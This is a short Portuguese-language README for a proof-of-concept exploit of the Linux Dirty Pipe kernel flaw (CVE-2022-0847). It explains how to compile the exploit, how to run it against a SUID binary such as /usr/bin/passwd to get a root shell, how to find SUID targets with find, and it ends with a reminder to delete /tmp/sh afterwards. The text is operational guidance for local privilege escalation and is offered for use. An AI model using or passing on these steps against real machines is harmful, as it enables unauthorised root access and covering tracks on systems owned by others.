
Prova de conceito de exploit para CVE-2022-0847 (Dirty Pipe) permitindo escalonamento de privilégio local via manipulação de binários SUID em kernels Linux.
Compilar
No Linux, gcc -o dirty dirty.c compila o programa PoC.
Uso
./dirty SUID executa o programa. Onde SUID refere-se ao caminho de um programa com SUID.
Geralmente pode ser usado /usr/bin/passwd, ou seja, execute ./dirty /usr/bin/passwd.

Pode obter um shell root.
Pode usar find / -perm /4000 para listar programas com SUID.


Não se esqueça de excluir /tmp/sh.
